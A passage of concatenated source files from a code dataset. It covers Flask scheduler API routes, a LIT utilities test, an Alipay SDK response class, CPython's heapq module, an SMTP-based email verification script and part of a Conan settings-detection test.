job = dagobah.get_job(args['job_name'])
job.schedule(args['cron_schedule'])
@app.route('/api/stop_scheduler', methods=['POST'])
@login_required
@api_call
def stop_scheduler():
dagobah.scheduler.stop()
@app.route('/api/restart_scheduler', methods=['POST'])
@login_required
@api_call
def restart_scheduler():
dagobah.scheduler.restart()
@app.route('/api/terminate_all_tasks', methods=['POST'])
@login_required
@api_call
def terminate_all_tasks():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.terminate_all()
@app.route('/api/kill_all_tasks', methods=['POST'])
@login_required
@api_call
def kill_all_tasks():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.kill_all()
@app.route('/api/terminate_task', methods=['POST'])
@login_required
@api_call
def terminate_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.terminate()
@app.route('/api/kill_task', methods=['POST'])
@login_required
@api_call
def kill_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.kill()
@app.route('/api/edit_job', methods=['POST'])
@login_required
@api_call
def edit_job():
args = dict(request.form)
if not validate_dict(args,
required=['job_name'],
job_name=str,
name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
del args['job_name']
job.edit(**args)
@app.route('/api/update_job_notes', methods=['POST'])
@login_required
@api_call
def update_job_notes():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'notes'],
job_name=str,
notes=str):
abort(400)
job = dagobah.get_job(args['job_name'])
job.update_job_notes(args['notes'])
@app.route('/api/edit_task', methods=['POST'])
@login_required
@api_call
def edit_task():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name'],
job_name=str,
task_name=str,
name=str,
command=str,
soft_timeout=int,
hard_timeout=int,
hostname=str):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
# validate host
if 'hostname' in args and args.get('hostname') not in dagobah.get_hosts():
# Check for empty host, if so then task is no longer remote
if not args.get('hostname'):
args['hostname'] = None
else:
abort(400)
del args['job_name']
del args['task_name']
job.edit_task(task.name, **args)
@app.route('/api/set_soft_timeout', methods=['POST'])
@login_required
@api_call
def set_soft_timeout():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name', 'soft_timeout'],
job_name=str,
task_name=str,
soft_timeout=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.set_soft_timeout(args['soft_timeout'])
@app.route('/api/set_hard_timeout', methods=['POST'])
@login_required
@api_call
def set_hard_timeout():
args = dict(request.form)
if not validate_dict(args,
required=['job_name', 'task_name', 'hard_timeout'],
job_name=str,
task_name=str,
hard_timeout=int):
abort(400)
job = dagobah.get_job(args['job_name'])
task = job.tasks.get(args['task_name'], None)
if not task:
abort(400)
task.set_hard_timeout(args['hard_timeout'])
@app.route('/api/export_job', methods=['GET'])
@login_required
def export_job():
args = dict(request.args)
if not validate_dict(args,
required=['job_name'],
job_name=str):
abort(400)
job = dagobah.get_job(args['job_name'])
to_send = StringIO.StringIO()
to_send.write(json.dumps(job._serialize(strict_json=True)))
to_send.write('\n')
to_send.seek(0)
return send_file(to_send,
attachment_filename='%s.json' % job.name,
as_attachment=True)
@app.route('/api/import_job', methods=['POST'])
@login_required
@api_call
def import_job():
file = request.files['file']
if (file and allowed_file(file.filename, ['json'])):
dagobah.add_job_from_json(file.read(), destructive=True)
@app.route('/api/hosts', methods=['GET'])
@login_required
@api_call
def get_hosts():
return dagobah.get_hosts()
|
lit_nlp/lib/utils_test.py
|
eichinflo/lit
| 2,854 |
66790
|
<gh_stars>1000+
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# Lint as: python3
"""Tests for lit_nlp.lib.utils."""
from absl.testing import absltest
from lit_nlp.api import types
from lit_nlp.lib import utils
class UtilsTest(absltest.TestCase):
def test_coerce_bool(self):
self.assertTrue(utils.coerce_bool(True))
self.assertTrue(utils.coerce_bool(1))
self.assertTrue(utils.coerce_bool(2.2))
self.assertTrue(utils.coerce_bool(True))
self.assertTrue(utils.coerce_bool([0]))
self.assertTrue(utils.coerce_bool({"a": "hi"}))
self.assertTrue(utils.coerce_bool("this is true"))
self.assertFalse(utils.coerce_bool(""))
self.assertFalse(utils.coerce_bool(0))
self.assertFalse(utils.coerce_bool("0"))
self.assertFalse(utils.coerce_bool(False))
self.assertFalse(utils.coerce_bool("false"))
self.assertFalse(utils.coerce_bool("False"))
self.assertFalse(utils.coerce_bool({}))
self.assertFalse(utils.coerce_bool([]))
def test_find_keys(self):
d = {
"a": True,
"b": False,
"c": True
}
self.assertEqual(["a", "c"], utils.find_keys(d, lambda a: a))
self.assertEqual([], utils.find_keys(d, lambda a: a == "nothing"))
self.assertEqual([], utils.find_keys({}, lambda a: a))
def test_find_spec_keys(self):
spec = {
"score": types.RegressionScore(),
"scalar_foo": types.Scalar(),
"text": types.TextSegment(),
"emb_0": types.Embeddings(),
"emb_1": types.Embeddings(),
"tokens": types.Tokens(),
"generated_text": types.GeneratedText(),
}
self.assertEqual(["score"], utils.find_spec_keys(spec,
types.RegressionScore))
self.assertEqual(["text", "tokens", "generated_text"],
utils.find_spec_keys(spec,
(types.TextSegment, types.Tokens)))
self.assertEqual(["emb_0", "emb_1"],
utils.find_spec_keys(spec, types.Embeddings))
self.assertEqual([], utils.find_spec_keys(spec, types.AttentionHeads))
# Check subclasses
self.assertEqual(
list(spec.keys()), utils.find_spec_keys(spec, types.LitType))
self.assertEqual(["text", "generated_text"],
utils.find_spec_keys(spec, types.TextSegment))
self.assertEqual(["score", "scalar_foo"],
utils.find_spec_keys(spec, types.Scalar))
def test_filter_by_keys(self):
pred = lambda k: k == "a" or k == "b"
d = {
"a": True,
"b": False,
"c": True
}
self.assertDictEqual({"a": True, "b": False}, utils.filter_by_keys(d, pred))
d2 = {
"1": True,
"2": False,
"3": True
}
self.assertDictEqual({}, utils.filter_by_keys(d2, pred))
self.assertDictEqual({}, utils.filter_by_keys({}, pred))
def test_copy_and_update(self):
d = {
"a": True,
"b": False,
"c": True
}
update = {
"a": False,
"b": True
}
expected = {
"a": False,
"b": True,
"c": True
}
self.assertDictEqual(expected, utils.copy_and_update(d, update))
d = {
"a": True,
"b": False,
}
update = {
"a": False,
"c": True
}
expected = {
"a": False,
"b": False,
"c": True
}
self.assertDictEqual(expected, utils.copy_and_update(d, update))
d = {
"a": True,
"b": False,
}
update = {}
self.assertDictEqual(d, utils.copy_and_update(d, update))
d = {}
update = {
"a": False,
"c": True
}
self.assertDictEqual(update, utils.copy_and_update(d, update))
def test_remap_dict(self):
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {
"a": "a2",
"b": "b2"
}
expected = {
"a2": True,
"b2": False,
"c": True
}
self.assertDictEqual(expected, utils.remap_dict(d, remap_dict))
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {}
self.assertDictEqual(d, utils.remap_dict(d, remap_dict))
d = {}
remap_dict = {
"a": "a2",
"b": "b2"
}
self.assertDictEqual(d, utils.remap_dict(d, remap_dict))
d = {
"a": True,
"b": False,
"c": True
}
remap_dict = {
"a": "b",
}
expected = {
"b": False,
"c": True
}
self.assertDictEqual(expected, utils.remap_dict(d, remap_dict))
def test_find_all_combinations(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=2, max_element_count=3)
expected = [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3],
[1, 2, 4], [1, 3, 4], [2, 3, 4]]
self.assertListEqual(combinations, expected)
def test_find_all_combinations_max_is_greater_than_len(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=2, max_element_count=10)
expected = [[1, 2], [1, 3], [1, 4], [2, 3], [2, 4], [3, 4], [1, 2, 3],
[1, 2, 4], [1, 3, 4], [2, 3, 4], [1, 2, 3, 4]]
self.assertListEqual(combinations, expected)
def test_find_all_combinations_min_is_greater_than_max(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=3, max_element_count=2)
expected = []
self.assertListEqual(combinations, expected)
def test_find_all_combinations_min_is_negative(self):
l = [1, 2, 3, 4]
combinations = utils.find_all_combinations(
l, min_element_count=-1, max_element_count=2)
expected = [[1], [2], [3], [4], [1, 2], [1, 3], [1, 4], [2, 3], [2, 4],
[3, 4]]
self.assertListEqual(combinations, expected)
if __name__ == "__main__":
absltest.main()
|
alipay/aop/api/response/AlipayCommerceEducateXuexinIdentityQueryResponse.py
|
antopen/alipay-sdk-python-all
| 213 |
66800
|
<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateXuexinIdentityQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateXuexinIdentityQueryResponse, self).__init__()
self._college_online_tag = None
self._graduate_time = None
self._reason_code = None
@property
def college_online_tag(self):
return self._college_online_tag
@college_online_tag.setter
def college_online_tag(self, value):
self._college_online_tag = value
@property
def graduate_time(self):
return self._graduate_time
@graduate_time.setter
def graduate_time(self, value):
self._graduate_time = value
@property
def reason_code(self):
return self._reason_code
@reason_code.setter
def reason_code(self, value):
self._reason_code = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateXuexinIdentityQueryResponse, self).parse_response_content(response_content)
if 'college_online_tag' in response:
self.college_online_tag = response['college_online_tag']
if 'graduate_time' in response:
self.graduate_time = response['graduate_time']
if 'reason_code' in response:
self.reason_code = response['reason_code']
|
Lib/heapq.py
|
pelotoncycle/cpython-fork
| 332 |
66812
|
"""Heap queue algorithm (a.k.a. priority queue).
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
Usage:
heap = [] # creates an empty heap
heappush(heap, item) # pushes a new item on the heap
item = heappop(heap) # pops the smallest item from the heap
item = heap[0] # smallest item on the heap without popping it
heapify(x) # transforms list into a heap, in-place, in linear time
item = heapreplace(heap, item) # pops and returns smallest item, and adds
# new item; the heap size is unchanged
Our API differs from textbook heap algorithms as follows:
- We use 0-based indexing. This makes the relationship between the
index for a node and the indexes for its children slightly less
obvious, but is more suitable since Python uses 0-based indexing.
- Our heappop() method returns the smallest item, not the largest.
These two make it possible to view the heap as a regular Python list
without surprises: heap[0] is the smallest item, and heap.sort()
maintains the heap invariant!
"""
# Original code by <NAME>, augmented by <NAME> and <NAME>
__about__ = """Heap queues
[explanation by <NAME>]
Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for
all k, counting elements from 0. For the sake of comparison,
non-existing elements are considered to be infinite. The interesting
property of a heap is that a[0] is always its smallest element.
The strange invariant above is meant to be an efficient memory
representation for a tournament. The numbers below are `k', not a[k]:
0
1 2
3 4 5 6
7 8 9 10 11 12 13 14
15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
In the tree above, each cell `k' is topping `2*k+1' and `2*k+2'. In
an usual binary tournament we see in sports, each cell is the winner
over the two cells it tops, and we can trace the winner down the tree
to see all opponents s/he had. However, in many computer applications
of such tournaments, we do not need to trace the history of a winner.
To be more memory efficient, when a winner is promoted, we try to
replace it by something else at a lower level, and the rule becomes
that a cell and the two cells it tops contain three different items,
but the top cell "wins" over the two topped cells.
If this heap invariant is protected at all time, index 0 is clearly
the overall winner. The simplest algorithmic way to remove it and
find the "next" winner is to move some loser (let's say cell 30 in the
diagram above) into the 0 position, and then percolate this new 0 down
the tree, exchanging values, until the invariant is re-established.
This is clearly logarithmic on the total number of items in the tree.
By iterating over all items, you get an O(n ln n) sort.
A nice feature of this sort is that you can efficiently insert new
items while the sort is going on, provided that the inserted items are
not "better" than the last 0'th element you extracted. This is
especially useful in simulation contexts, where the tree holds all
incoming events, and the "win" condition means the smallest scheduled
time. When an event schedule other events for execution, they are
scheduled into the future, so they can easily go into the heap. So, a
heap is a good structure for implementing schedulers (this is what I
used for my MIDI sequencer :-).
Various structures for implementing schedulers have been extensively
studied, and heaps are good for this, as they are reasonably speedy,
the speed is almost constant, and the worst case is not much different
than the average case. However, there are other representations which
are more efficient overall, yet the worst cases might be terrible.
Heaps are also very useful in big disk sorts. You most probably all
know that a big sort implies producing "runs" (which are pre-sorted
sequences, which size is usually related to the amount of CPU memory),
followed by a merging passes for these runs, which merging is often
very cleverly organised[1]. It is very important that the initial
sort produces the longest runs possible. Tournaments are a good way
to that. If, using all the memory available to hold a tournament, you
replace and percolate items that happen to fit the current run, you'll
produce runs which are twice the size of the memory for random input,
and much better for input fuzzily ordered.
Moreover, if you output the 0'th item on disk and get an input which
may not fit in the current tournament (because the value "wins" over
the last output value), it cannot fit in the heap, so the size of the
heap decreases. The freed memory could be cleverly reused immediately
for progressively building a second heap, which grows at exactly the
same rate the first heap is melting. When the first heap completely
vanishes, you switch heaps and start a new run. Clever and quite
effective!
In a word, heaps are useful memory structures to know. I use them in
a few applications, and I think it is good to keep a `heap' module
around. :-)
--------------------
[1] The disk balancing algorithms which are current, nowadays, are
more annoying than clever, and this is a consequence of the seeking
capabilities of the disks. On devices which cannot seek, like big
tape drives, the story was quite different, and one had to be very
clever to ensure (far in advance) that each tape movement will be the
most effective possible (that is, will best participate at
"progressing" the merge). Some tapes were even able to read
backwards, and this was also used to avoid the rewinding time.
Believe me, real good tape sorts were quite spectacular to watch!
From all times, sorting has always been a Great Art! :-)
"""
__all__ = ['heappush', 'heappop', 'heapify', 'heapreplace', 'merge',
'nlargest', 'nsmallest', 'heappushpop']
def heappush(heap, item):
"""Push item onto heap, maintaining the heap invariant."""
heap.append(item)
_siftdown(heap, 0, len(heap)-1)
def heappop(heap):
"""Pop the smallest item off the heap, maintaining the heap invariant."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup(heap, 0)
return returnitem
return lastelt
def heapreplace(heap, item):
"""Pop and return the current smallest value, and add the new item.
This is more efficient than heappop() followed by heappush(), and can be
more appropriate when using a fixed-size heap. Note that the value
returned may be larger than item! That constrains reasonable uses of
this routine unless written as part of a conditional replacement:
if item > heap[0]:
item = heapreplace(heap, item)
"""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup(heap, 0)
return returnitem
def heappushpop(heap, item):
"""Fast version of a heappush followed by a heappop."""
if heap and heap[0] < item:
item, heap[0] = heap[0], item
_siftup(heap, 0)
return item
def heapify(x):
"""Transform list into a heap, in-place, in O(len(x)) time."""
n = len(x)
# Transform bottom-up. The largest index there's any point to looking at
# is the largest with a child index in-range, so must have 2*i + 1 < n,
# or i < (n-1)/2. If n is even = 2*j, this is (2*j-1)/2 = j-1/2 so
# j-1 is the largest, which is n//2 - 1. If n is odd = 2*j+1, this is
# (2*j+1-1)/2 = j so j-1 is the largest, and that's again n//2-1.
for i in reversed(range(n//2)):
_siftup(x, i)
def _heappop_max(heap):
"""Maxheap version of a heappop."""
lastelt = heap.pop() # raises appropriate IndexError if heap is empty
if heap:
returnitem = heap[0]
heap[0] = lastelt
_siftup_max(heap, 0)
return returnitem
return lastelt
def _heapreplace_max(heap, item):
"""Maxheap version of a heappop followed by a heappush."""
returnitem = heap[0] # raises appropriate IndexError if heap is empty
heap[0] = item
_siftup_max(heap, 0)
return returnitem
def _heapify_max(x):
"""Transform list into a maxheap, in-place, in O(len(x)) time."""
n = len(x)
for i in reversed(range(n//2)):
_siftup_max(x, i)
# 'heap' is a heap at all indices >= startpos, except possibly for pos. pos
# is the index of a leaf with a possibly out-of-order value. Restore the
# heap invariant.
def _siftdown(heap, startpos, pos):
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if newitem < parent:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
# The child indices of heap index pos are already heaps, and we want to make
# a heap at index pos too. We do this by bubbling the smaller child of
# pos up (and so on with that child's children, etc) until hitting a leaf,
# then using _siftdown to move the oddball originally at index pos into place.
#
# We *could* break out of the loop as soon as we find a pos where newitem <=
# both its children, but turns out that's not a good idea, and despite that
# many books write the algorithm that way. During a heap pop, the last array
# element is sifted in, and that tends to be large, so that comparing it
# against values starting from the root usually doesn't pay (= usually doesn't
# get us out of the loop early). See Knuth, Volume 3, where this is
# explained and quantified in an exercise.
#
# Cutting the # of comparisons is important, since these routines have no
# way to extract "the priority" from an array element, so that intelligence
# is likely to be hiding in custom comparison methods, or in array elements
# storing (priority, record) tuples. Comparisons are thus potentially
# expensive.
#
# On random arrays of length 1000, making this change cut the number of
# comparisons made by heapify() a little, and those made by exhaustive
# heappop() a lot, in accord with theory. Here are typical results from 3
# runs (3 just to demonstrate how small the variance is):
#
# Compares needed by heapify Compares needed by 1000 heappops
# -------------------------- --------------------------------
# 1837 cut to 1663 14996 cut to 8680
# 1855 cut to 1659 14966 cut to 8678
# 1847 cut to 1660 15024 cut to 8703
#
# Building the heap by using heappush() 1000 times instead required
# 2198, 2148, and 2219 compares: heapify() is more efficient, when
# you can use it.
#
# The total compares needed by list.sort() on the same lists were 8627,
# 8627, and 8632 (this should be compared to the sum of heapify() and
# heappop() compares): list.sort() is (unsurprisingly!) more efficient
# for sorting.
def _siftup(heap, pos):
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the smaller child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of smaller child.
rightpos = childpos + 1
if rightpos < endpos and not heap[childpos] < heap[rightpos]:
childpos = rightpos
# Move the smaller child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown(heap, startpos, pos)
def _siftdown_max(heap, startpos, pos):
'Maxheap variant of _siftdown'
newitem = heap[pos]
# Follow the path to the root, moving parents down until finding a place
# newitem fits.
while pos > startpos:
parentpos = (pos - 1) >> 1
parent = heap[parentpos]
if parent < newitem:
heap[pos] = parent
pos = parentpos
continue
break
heap[pos] = newitem
def _siftup_max(heap, pos):
'Maxheap variant of _siftup'
endpos = len(heap)
startpos = pos
newitem = heap[pos]
# Bubble up the larger child until hitting a leaf.
childpos = 2*pos + 1 # leftmost child position
while childpos < endpos:
# Set childpos to index of larger child.
rightpos = childpos + 1
if rightpos < endpos and not heap[rightpos] < heap[childpos]:
childpos = rightpos
# Move the larger child up.
heap[pos] = heap[childpos]
pos = childpos
childpos = 2*pos + 1
# The leaf at pos is empty now. Put newitem there, and bubble it up
# to its final resting place (by sifting its parents down).
heap[pos] = newitem
_siftdown_max(heap, startpos, pos)
def merge(*iterables, key=None, reverse=False):
'''Merge multiple sorted inputs into a single sorted output.
Similar to sorted(itertools.chain(*iterables)) but returns a generator,
does not pull the data into memory all at once, and assumes that each of
the input streams is already sorted (smallest to largest).
>>> list(merge([1,3,5,7], [0,2,4,8], [5,10,15,20], [], [25]))
[0, 1, 2, 3, 4, 5, 5, 7, 8, 10, 15, 20, 25]
If *key* is not None, applies a key function to each element to determine
its sort order.
>>> list(merge(['dog', 'horse'], ['cat', 'fish', 'kangaroo'], key=len))
['dog', 'cat', 'fish', 'horse', 'kangaroo']
'''
h = []
h_append = h.append
if reverse:
_heapify = _heapify_max
_heappop = _heappop_max
_heapreplace = _heapreplace_max
direction = -1
else:
_heapify = heapify
_heappop = heappop
_heapreplace = heapreplace
direction = 1
if key is None:
for order, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
h_append([next(), order * direction, next])
except StopIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
value, order, next = s = h[0]
yield value
s[0] = next() # raises StopIteration when exhausted
_heapreplace(h, s) # restore heap condition
except StopIteration:
_heappop(h) # remove empty iterator
if h:
# fast case when only a single iterator remains
value, order, next = h[0]
yield value
yield from next.__self__
return
for order, it in enumerate(map(iter, iterables)):
try:
next = it.__next__
value = next()
h_append([key(value), order * direction, value, next])
except StopIteration:
pass
_heapify(h)
while len(h) > 1:
try:
while True:
key_value, order, value, next = s = h[0]
yield value
value = next()
s[0] = key(value)
s[2] = value
_heapreplace(h, s)
except StopIteration:
_heappop(h)
if h:
key_value, order, value, next = h[0]
yield value
yield from next.__self__
# Algorithm notes for nlargest() and nsmallest()
# ==============================================
#
# Make a single pass over the data while keeping the k most extreme values
# in a heap. Memory consumption is limited to keeping k values in a list.
#
# Measured performance for random inputs:
#
# number of comparisons
# n inputs k-extreme values (average of 5 trials) % more than min()
# ------------- ---------------- --------------------- -----------------
# 1,000 100 3,317 231.7%
# 10,000 100 14,046 40.5%
# 100,000 100 105,749 5.7%
# 1,000,000 100 1,007,751 0.8%
# 10,000,000 100 10,009,401 0.1%
#
# Theoretical number of comparisons for k smallest of n random inputs:
#
# Step Comparisons Action
# ---- -------------------------- ---------------------------
# 1 1.66 * k heapify the first k-inputs
# 2 n - k compare remaining elements to top of heap
# 3 k * (1 + lg2(k)) * ln(n/k) replace the topmost value on the heap
# 4 k * lg2(k) - (k/2) final sort of the k most extreme values
#
# Combining and simplifying for a rough estimate gives:
#
# comparisons = n + k * (log(k, 2) * log(n/k) + log(k, 2) + log(n/k))
#
# Computing the number of comparisons for step 3:
# -----------------------------------------------
# * For the i-th new value from the iterable, the probability of being in the
# k most extreme values is k/i. For example, the probability of the 101st
# value seen being in the 100 most extreme values is 100/101.
# * If the value is a new extreme value, the cost of inserting it into the
# heap is 1 + log(k, 2).
# * The probability times the cost gives:
# (k/i) * (1 + log(k, 2))
# * Summing across the remaining n-k elements gives:
# sum((k/i) * (1 + log(k, 2)) for i in range(k+1, n+1))
# * This reduces to:
# (H(n) - H(k)) * k * (1 + log(k, 2))
# * Where H(n) is the n-th harmonic number estimated by:
# gamma = 0.5772156649
# H(n) = log(n, e) + gamma + 1 / (2 * n)
# http://en.wikipedia.org/wiki/Harmonic_series_(mathematics)#Rate_of_divergence
# * Substituting the H(n) formula:
# comparisons = k * (1 + log(k, 2)) * (log(n/k, e) + (1/n - 1/k) / 2)
#
# Worst-case for step 3:
# ----------------------
# In the worst case, the input data is reversed sorted so that every new element
# must be inserted in the heap:
#
# comparisons = 1.66 * k + log(k, 2) * (n - k)
#
# Alternative Algorithms
# ----------------------
# Other algorithms were not used because they:
# 1) Took much more auxiliary memory,
# 2) Made multiple passes over the data.
# 3) Made more comparisons in common cases (small k, large n, semi-random input).
# See the more detailed comparison of approach at:
# http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
def nsmallest(n, iterable, key=None):
"""Find the n smallest elements in a dataset.
Equivalent to: sorted(iterable, key=key)[:n]
"""
# Short-cut for n==1 is to use min()
if n == 1:
it = iter(iterable)
sentinel = object()
if key is None:
result = min(it, default=sentinel)
else:
result = min(it, default=sentinel, key=key)
return [] if result is sentinel else [result]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key)[:n]
# When key is none, use simpler decoration
if key is None:
it = iter(iterable)
# put the range(n) first so that zip() doesn't
# consume one too many elements from the iterator
result = [(elem, i) for i, elem in zip(range(n), it)]
if not result:
return result
_heapify_max(result)
top = result[0][0]
order = n
_heapreplace = _heapreplace_max
for elem in it:
if elem < top:
_heapreplace(result, (elem, order))
top = result[0][0]
order += 1
result.sort()
return [r[0] for r in result]
# General case, slowest method
it = iter(iterable)
result = [(key(elem), i, elem) for i, elem in zip(range(n), it)]
if not result:
return result
_heapify_max(result)
top = result[0][0]
order = n
_heapreplace = _heapreplace_max
for elem in it:
k = key(elem)
if k < top:
_heapreplace(result, (k, order, elem))
top = result[0][0]
order += 1
result.sort()
return [r[2] for r in result]
def nlargest(n, iterable, key=None):
"""Find the n largest elements in a dataset.
Equivalent to: sorted(iterable, key=key, reverse=True)[:n]
"""
# Short-cut for n==1 is to use max()
if n == 1:
it = iter(iterable)
sentinel = object()
if key is None:
result = max(it, default=sentinel)
else:
result = max(it, default=sentinel, key=key)
return [] if result is sentinel else [result]
# When n>=size, it's faster to use sorted()
try:
size = len(iterable)
except (TypeError, AttributeError):
pass
else:
if n >= size:
return sorted(iterable, key=key, reverse=True)[:n]
# When key is none, use simpler decoration
if key is None:
it = iter(iterable)
result = [(elem, i) for i, elem in zip(range(0, -n, -1), it)]
if not result:
return result
heapify(result)
top = result[0][0]
order = -n
_heapreplace = heapreplace
for elem in it:
if top < elem:
_heapreplace(result, (elem, order))
top = result[0][0]
order -= 1
result.sort(reverse=True)
return [r[0] for r in result]
# General case, slowest method
it = iter(iterable)
result = [(key(elem), i, elem) for i, elem in zip(range(0, -n, -1), it)]
if not result:
return result
heapify(result)
top = result[0][0]
order = -n
_heapreplace = heapreplace
for elem in it:
k = key(elem)
if top < k:
_heapreplace(result, (k, order, elem))
top = result[0][0]
order -= 1
result.sort(reverse=True)
return [r[2] for r in result]
# If available, use C implementation
try:
from _heapq import *
except ImportError:
pass
try:
from _heapq import _heapreplace_max
except ImportError:
pass
try:
from _heapq import _heapify_max
except ImportError:
pass
try:
from _heapq import _heappop_max
except ImportError:
pass
if __name__ == "__main__":
import doctest
print(doctest.testmod())
|
src/VerifyEmailAddress.py
|
MyPersonalUserSF/Python-Email-Verification-Script
| 166 |
66836
|
import re
import smtplib
import dns.resolver
# Address used for SMTP MAIL FROM command
fromAddress = '<EMAIL>'
# Simple Regex for syntax checking
regex = '^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$'
# Email address to verify
inputAddress = input('Please enter the emailAddress to verify:')
addressToVerify = str(inputAddress)
# Syntax check
match = re.match(regex, addressToVerify)
if match == None:
print('Bad Syntax')
raise ValueError('Bad Syntax')
# Get domain for DNS lookup
splitAddress = addressToVerify.split('@')
domain = str(splitAddress[1])
print('Domain:', domain)
# MX record lookup
records = dns.resolver.query(domain, 'MX')
mxRecord = records[0].exchange
mxRecord = str(mxRecord)
# SMTP lib setup (use debug level for full output)
server = smtplib.SMTP()
server.set_debuglevel(0)
# SMTP Conversation
server.connect(mxRecord)
server.helo(server.local_hostname) ### server.local_hostname(Get local server hostname)
server.mail(fromAddress)
code, message = server.rcpt(str(addressToVerify))
server.quit()
#print(code)
#print(message)
# Assume SMTP response 250 is success
if code == 250:
print('Success')
else:
print('Bad')
|
conans/test/unittests/util/detect_test.py
|
fanStefan/conan
| 6,205 |
66862
|
<filename>conans/test/unittests/util/detect_test.py
import mock
import unittest
from mock import Mock
from parameterized import parameterized
from conans.client import tools
from conans.client.conf.detect import detect_defaults_settings
from conans.paths import DEFAULT_PROFILE_NAME
from conans.test.utils.mocks import TestBufferConanOutput
class DetectTest(unittest.TestCase):
@mock.patch("platform.machine", return_value="")
def test_detect_empty_arch(self, _):
result = detect_defaults_settings(output=Mock(),
profile_path=DEFAULT_PROFILE_NAME)
result = dict(result)
self.assertTrue("arch" not in result)
self.assertTrue("arch_build" not in result)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_custom_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="~/.conan/profiles/mycustomprofile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "
"mycustomprofile", output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_default_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="~/.conan/profiles/default")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 default",
output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_file_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="./MyProfile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 MyProfile",
output)
@mock.patch("conans.client.conf.detect._gcc_compiler", return_value=("gcc", "8"))
def test_detect_abs_file_profile(self, _):
output = TestBufferConanOutput()
with tools.environment_append({"CC": "gcc"}):
detect_defaults_settings(output, profile_path="/foo/bar/quz/custom-profile")
self.assertIn("conan profile update settings.compiler.libcxx=libstdc++11 "
"custom-profile", output)
@parameterized.expand([
['powerpc', '64', '7.1.0.0', 'ppc64'],
['powerpc', '32', '7.1.0.0', 'ppc32'],
['rs6000', None, '4.2.1.0', 'ppc32']
])
def test_detect_aix(self, processor, bitness, version, expected_arch):
with mock.patch("platform.machine", mock.MagicMock(return_value='XXXXXXXXXXXX')), \
mock.patch("platform.processor", mock.MagicMock(return_value=processor)), \
mock.patch("platform.system", mock.MagicMock(return_value='AIX')), \
mock.patch("conans.client.tools.oss.OSInfo.get_aix_conf", mock.MagicMock(return_value=bitness)), \
